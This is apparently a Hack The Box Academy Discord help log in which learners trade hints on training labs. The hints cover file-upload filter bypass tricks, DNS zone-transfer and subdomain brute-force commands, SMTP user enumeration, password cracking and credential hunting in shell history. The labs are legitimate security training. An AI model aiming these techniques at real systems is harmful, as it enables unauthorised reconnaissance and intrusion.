any hint for the FILE UPLOAD ATTACKS Blacklist Filters
i am able to upload file but not getting code execute
try with hello word

Make sure to use magic bytes of you haven't. The png bytes look funky also

...

yes i have done that

php6 & pHp is getting upload

not not able to code execute

yes

Apache/

Content-Type:?

Can someone help me? Identify if its possible to perform a zone transfer and submit the TXT record as the answer ,But tried all of them as the answer, and with the format it specifies, but it doesn't work. Any ideas?

First do a zone transfer

After that one of those zones you can transfer to has a txt record to grab

i did that

You need to specify the dns server using @<the ip given by htb>

That too

||dig TXT app.inlanefreight.htb @10.129.109.128|| this way correct ?

Yes

The @ip part is important. It tells dig that the IP is the nameserver to use

thanks got it

Where can we go to see the public fingerprint of HTB?

fingerprints*

I earned the badge for completing Password Attack module
best good morning ever xD

25% of path penetration tester passed
thats a not easy way o_o

This has nothing to do with the modules, read #rules and #welcome

@Mar

@fathom pendant Well, I am working on Getting Started module... And I'm trying to connect with SSH.

The fingerprints are randomly generated by their nature there's not really a full set of public ones

Fingerprinting is just for that target in particular

So how can one verify that we are indeed connecting to the desired host?

If you use the provided credentials, and they work. You're on the desired host

It's really not a hard concept

In this case perhaps

as a general standard it seems a bit strange

In every case

why even have a fingerprint if there is no way to verify?

Fingerprinting is just a measure for revisiting a static IP

...

The IPs (for the most part) are randomly generated in the 10.x.x.x range excluding the 10.10.x.x range

If not authenticating with the host, there could be a possibility of MITM attack, yes?

You won't get the same fingerprint if you reset the target and ssh into the new IP

HTB machines are fairly isolated (hence the need for VPN if not using pwnbox)

The 10.x.x.x format is private IP. Whenever a public IP is used it will always be on a docker container

Uhm, then I dont understand the need for a fingerprint, if it is equal to the IP (which is already known)

It is not equal to an IP

but the fingerprint corresponds to an IP

?

https://docs.rackspace.com/support/how-to/rackspace-cloud-essentials-check-the-ssh-host-fingerprint-of-a-server-with-the-web-console/#:~:text=Secure Shell (SSH) uses a,verified or it has changed.

The likelihood of a MITM attack using htb infra is fairly slim

True, but on should always use good practices in cybsec

Eliminate all possible attack vectors

When you click "spawn target" it spawns a virtual machine that is only accessible internally, it is preconfigured with the lab vulnerabilities.

You're literally focusing on a nothing

If you truly want to eliminate MITM potentiality just do it all from the in-browser pwnbox

¯_(ツ)_/¯

As all of that is within htb infra

congrats 👏🏻

The only way for MITM to effect you is if someone was attacking you specifically

In this case perhaps, when connecting to an ssh in other cases that might not be a valid way

In any case with HTB modules

I'm trying to adopt best standard practices, sorry for being stubborn, still a n00b

While you aren't wrong for external purposes and static networks. Academy is a fluid and dynamic network

You're never going to get the same fingerprint twice

Because, as stated, the boxes are spawned on a per-need basis

And are super isolated to the point where odds are super slim that someone else is touching the same lab as you

So a fingerprint is an unique "code" that corresponds to the hosted box, and in HTB's case they change since a box is hosted on a per-need basis?

Yep. Literally the reason it can take a minute for you to get an IP is literally because the VM is launching the box

And doesn't have one to give you

It's also why you can't leave your own trails on labs if you intend to revisit them

Because all it takes is one person to leave a wide open backdoor to completely negate the point of the lab if they were just constantly open boxes

can you help me with this one:User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them. can you show me the filter for retrieving the txt in those files

Hmmm, so let's say that I host a server where users can connect to my host via ssh. I should then publicly share the fingerprint, i.e on a webpage https://www.supersite.org/publicfingerprint.html for users to verify the fingerprint with the one the users see in their terminal??

https://superuser.com/questions/1503993/cmd-command-to-open-all-files-in-a-subdirectory you will need to change 'start' to 'type'

Something like that. Yeah.

But that's outside of anything the modules cover

Hi there, I'm on the Active Directory Enumeration & Attack module, LLMNR Poisoning from Linux. I'm cracking wley ntlm hash but I'm not able to get it. Can someone help me?

Anyone did the Intro to Threat Hunting and Hunting with Elastic module?

wrong channel

https://discord.com/channels/473760315293696010/569166988707102721

I dont have access!! 😦

you will have to verify, check out #welcome

gaming and etc

i'm on last question about DNS, cannot get hostname with x.x.x.203. I tried to enumerate with both dnsenum and dig loop, tried seclists's dictionaries and cannot get the right answer. Most of all, brute-forcing and using dig on a single hostname IP address of which is already known does not show IP address ( A record )

Hey guys! I'm kind of new to all this and I have started with the HTTP Fundamentals. I've gone through some exercises already and read some articles, but I got stuck. I am stuck at HTTP Methods, more specifically on the GET method exercise. I have trouble finding the 'flag' and obtaining it. I've searched the search.php file, but there was only my search result within it. Can someone guide me on that one? 😮 Thanks in advance!

Subdomains of subdomains. Fierce hostlist

yes, i tried this dictionary too

Your command will contain a.inlanefreight.htb

Where a is the subdomain

I tried all subdomains

THe most interesting part, when i try to dig A record hostnames i already know, it does not give me IP address

And your command is wrong :) i* isn't the correct subdomain

Hi everyone, AD Enumeration & Attacks - Skills Assessment Part II, "Crack this user's password hash and submit the cleartext password as your answer" I got the hash and cracked the password. Could someone DM me to clarify something please? Thanks

HI all, Password attacks section, and skill assessment lab easy. I am trying to crack root pass for last 2 days. Tried following

1. Provide Password list in PW-attack
2. used mutated password list leng 8,9,10,11

no luck

can someone give hint on which password list to go alnog

Why are you limiting the password length?

there are 91k entries so i grouped them up into multiple files with each file having fixed length password.

Ah so needlessly extending the time you take

yes

it gets you easy on password attempts like you may know most probable password lenght could be 8,9 or 10

Any advice on which list to use for cracking.

Give me a few minutes to go check but it should be on mut_passwords

can you give me wc -l of your mut_passwords?

94044

good enough

same as mine

will try this again.

do i have to find any other user or shall i use root as the only known account?

wow I love what you guys did with the bloodhound module. Thanks for the playground 🙂

my prayers were answered 😄

thanks! i neglected error command which showed my mistake on command

I would definitely look around a fair bit to see what you can find

Thanks. I am trying it again.

Ah I just realized that you should probably be studying your history

My notes for this module were sparse. This user was near the top of their class in history

Hi guys. I did some searching through this room back to October of 2022 to try and find an answer to my question and unfortunately I was unable to.

Could I request a nudge in the right direction for the Basic Bypasses page in the File Inclusion module in the Academy? I am stuck on the "The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt" question.

I've tried 15 different payloads and all of them have resulted in failure. I wrote them down as well so someone could tell me if I'm close or just not even in the right ballpark

sure, dm me if you want

Thank you

Hey guys, I currently have a shell on a target machine which i exploiter with elfinder i identified a sudo version 1.8.31 and found relevant exploit but i dont know how to save the shell as sessions

└─# smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t 10.129.211.135
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... footprinting-wordlist.txt
Target count ............. 1
Username count ........... 101
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Thu May 25 09:40:21 2023 #########





######## Scan completed at Thu May 25 09:42:06 2023 #########
0 results.

101 queries in 105 seconds (1.0 queries / sec
```   have to use another wordlists ?

also i have used nmap script and metsploit still doesnt work

SMTP is notoriously slow might have to __W__ait at least 25 seconds between attempts

It helps if you tell us what module you're working on

Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... footprinting-wordlist.txt
Target count ............. 1
Username count ........... 101
Target TCP port .......... 25
Query timeout ............ 25 secs
Target domain ............

######## Scan started at Thu May 25 10:07:11 2023 ######### 
``` it should work now

set the timeout to 25 secs

Ye

got it thanks

Wooo

Yo I have this problem in file inclusion modules

• 1 Submit the contents of the flag.txt file located in the /usr/share/flags directory.

I already have the flag and when I submit, it still failed.

anybody have a problem with this ?

Ok

nvm

got it

ATTACKING COMMON SERVICES (Attacking Email Services)

$ python o365spray.py --validate --domain inlanefreight.htb

*** O365 Spray ***

----------------------------------------<
version : 3.0.2
domain : inlanefreight.htb
validate : True
validate_module: getuserrealm
timeout : 25 seconds
start : 2023-05-25 15:38:44

----------------------------------------<
[2023-05-25 15:38:44,369] info | Validating: inlanefreight.htb
[2023-05-25 15:38:44,788] info | [FAILED] The following domain does not appear to be using O365: inlanefreight.htb

Reasons why o365spray tools don't work??

For this reason "The following domain does not appear to be using O365"

currently working through Pass the Ticket in Windows - Password Attacks module. As I am trying to do mimikatz powershell remoting with pass the ticket, I am getting this error:

Not sure what is going wrong here.

So I can't find the inlanefreight.htb domain password with this tool

scroll up in this chat a tad and see who else was just working on this and what tool they used

I am having no issues powershell remoting with rubeus though

Got root on Password attack Lab - Easy but not sure if this was the intended way. Anyone want to dm and see if they have the same way? I can show proof.

If it involves studying history: it's intended

Thanks

Afaik that's the ONLY way to get the root PW unless there's some craaaazy exploit

Didn't expect that to be the intended way tbh

good for me that it was the first thing I had a look at haha ¯_(ツ)_/¯

Nah it's very much intended :) and honestly should be one of the first things you do

Lol you'd be surprised how many people bash their heads against the wall on it

But also when grabbing the creds like that always do
su root and enter the pw

To double verify

:)

I made good progress. Never looked at it before the CPTS path 🙂

Also always take notes! Lol

No worries 😉

The medium and hard labs definitely dive harder into the password cracking and jumping back and forth. Definitely rewarding to complete those

At it now. Will be happy if this module is over... Took waaaaay too much time

Most of the way too much is time consuming cracks xD and waiting for some of the brutes

Struggled a lot with some questions aswel

@fathom pendant can I dm u a question I have

✨ No ✨ I do not accept DMs unless the question has been asked here and I'm already actively engaged in assisting you

Fair enough

Can anyone show me an example of notes they've made for a module

I haven't been making any notes and I wouldn't mind an example

My notes are actually separated: the practical notes, the lab, and the skill assessment(s)

Would it just be whatever commands you've tried

And output

Or is it more than that

So the practical notes are from the section I'm doing

Boiling out the fluff words

The lab itself, since I use obsidian is on their canvas feature

Appreciate the breakdown

I'll have a look into obsidian

Green is the info text/starting yellow is a direct answer, orange is the mid/potentially high vulnerable user/service I'm currently exploiting

I zoomed out so it didn't reveal spoilers

Ur a real one icl

Been a massive help for me

Thanks mate

With obsidian you can also do back links to your notes

For example I can link to my SMTP notes, and specifically the header titled 'ports' in this example

How can i start in cybersecurity guys ? i'm new

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

if only obsidian was free

It is

¯_(ツ)_/¯

need a nudge for password attack medium lab. i've gotten to the point where i have ssh'ed into the machine as jn. i see the user d*s on there as well. i checked to see if the box is part of an AD environment by using the ps -ef | grep -i "winbind|sssd" command. With that command i confirmed that it is indeed part of AD. i went through all the "pass the ticket linux" commands and tools with no luck. Decided i would go through all the "credential hunting in linux" commands. No luck. Ran "firefox decrypt" and "lazagne" with no luck either. Looked through interesting config files and nothing. Not sure where to go. Thanks for any help.

Dennis history is interesting

i'll give it a try here in a few min. i guess my question is. If i am logged in as jason without dennis creds, i can see dennis's history?

when i logged in as jason, 'history' was the first command i ran but i remember nothing being there

i'll double check here in a few minutes, thanks though

Do you have D* creds?

If not then J*can also be useful to find an internal service :)

i dont have dennis creds. cool, i think thats the nudge. thanks

There's also documentation that may be more helpful in reference to J* creds

I edited my responses to redact spoilers

Free version doesn't sync.

That's a personal problem then

i don't have a need for syncing so it hadn't been an issue ¯_(ツ)_/¯

Yeah, but you might as well use vscode

markdown and better looking visually

*vscodium

You can do markdown in vscode

we have our preferences ¯_(ツ)_/¯

Yep. People will use what they are happy with... even emacs (ugh).

just a general question. if you ssh into a specific machine and run linpeas. if you then ssh into that SAME machine but with someone else's creds, does it make sense to run linpeas again?

Generally yes. But linpeas should be run as root user/sudo

But also linpeas can lead you down unrelated rabbit holes

thank you

What about image.phar.png

Well only if youre pre-emptively checking a box

if youre actively exploiting it then linpeas as root is a little too late lol

Lol yeah

But I tend to use linpeas as last resort. Because it's led me down rabbit holes

Yeah it can also be slow and a firehose of info in a situation where sudo -l gives you the path forward lol

so yeah I dont use linpeas either until Ive exhausted manual checks that come to mind

Then linpeas is like "hey that thing you just did manually? Yeah that was vulnerable, lul"

On "Attacking Common Services - Medium" - am I on the right track with app.inlanefreight.htb? Cant seem to find anything else useful but this isnt leading me anywhere either

Iirc yes. You just need to have it in your /etc/hosts

hey
just signed up and did the tutorial and stuff
my question is that as i calculated rq i cant really do anything except the basic courses (which cost 10 and reward 10, so tier 0) without actually paying
so is this right or no
that i have to invest in some to actually get a course which is full of content and stuff

and whats there i can do basically to get some actual knowledge but for free

Utilize the basics to determine if you want to continue to pursue this field. If you choose to continue, then the few dollars a month or even a one time investment is worth the knowledge.

Considering the price of any valid certification, academy is dirt cheap.

Quick question, what is the ls command to search for the last edited file in a directory

Ls, list stuff

?

just ls the directory?

ls by default lists the current directory

ls -altr

Try that

You can provide it a filepath

man ls

ls -altr /path/to/file/directory

Thank you @polar widget

hey guys if anyone is free and willing to help and has done cubemadness 2, please DM me, I'd really appreciate it 🙂

This isn't the place to ask read #rules and #welcome

(y)

Read and you wont have to ask y

Use what is mentioned in the hint and scramble it

using the methods taught in a previous section

Scramble = mutate it

is there any way to resize the xfreerdp?

yes

use the /dynamic-resolution parameter

how?

inside the xfreerdp?

"who in most cases"

In your xfreeerdp command

xfreeerdp /v:IP /u:user /p:pass /dynamic-resolution

i resize it

and the part i resize stays black

if the machine's max resolution is smaller than yours it will stay like that

This doesn't seem related to an academy module, please read #rules and #welcome

okay sorry where should i post my question ?

If you read the channels I linked, you may find a more suitable channel

If anything #1024429874246590575

okay thank you ❤️

But no guarantees of answers

so sad

i won't post

I mean you don't get answers if you don't ask

ahh i thought i can't have answer

i just can't say there's a guarantee that someone in the server knows what you're trying to accomplish ¯_(ツ)_/¯

okay let me post it and see if anyone can help me

it is easy for someone manipulated wazuh before

just simple rules

¯_(ツ)_/¯

Again I've pointed you to the right place to ask. So ask there

Or at least, a right place to ask

i did thank you

let's wait now and see

Im in DNS enumeration and I cannot for the life of me find the xxx.xx.xx.203 FQDN. I tried dnsenum on inlanefreight.htb and internal.inlanefreight.htb. anyone got any hints on this one

There are more subdomains

The point of brute forcing is if it's not willingly giving you info

i have app. ns. internal. and a few others. I think I missed something in zone enumeration

You also need the right wordlist

Something a bit ferocious, so to speak

ahhhh

Your answer will look like a.b.inlanefreight.htb

so it's not a long dive

awesome thanks. I have been on this one for a long time. DNS and my brain just don't mesh sometimes

No problem. Focusing on the wrong thing certainly happens

dnsenum --dnsserver XX.XX.XX.XXX --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/fXXXXXXXX.txt inlanefreight.htb

used that and recieved only two subdomains that I already have. app and ns.

I'm in Hacking WordPress Skill Assessment. Question: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
I'm a little confused as I found the flag on a website without downloading any file. Is that how it is intended?

Relatable af

Look again at the hint from Marcie

You should already have a base subdomain list from a zone transfer to inlandfreight.htb, one of those subdomains will be your answer

You can almost always ignore ns.x.x for domains

It can be an indication of which subdomain is a separate zone

I just meant for brute forcing

Usually there's not anything below that

However not always

Zone is not equal to domain 🙂

A DNS zone is a part of the DNS namespace managed by an organization or person. It is an administrative entity.
At least one authoritative name server is responsible for each zone.

I don't think I am doing something wrong, but when I attempt to RDP in AD module, I encounter an error that says certificate validation error.
Please dm me for the picture because I can't send it and the bot won't let me type it. Is it a me issue?

read #welcome
Once you are verified you can upload pictures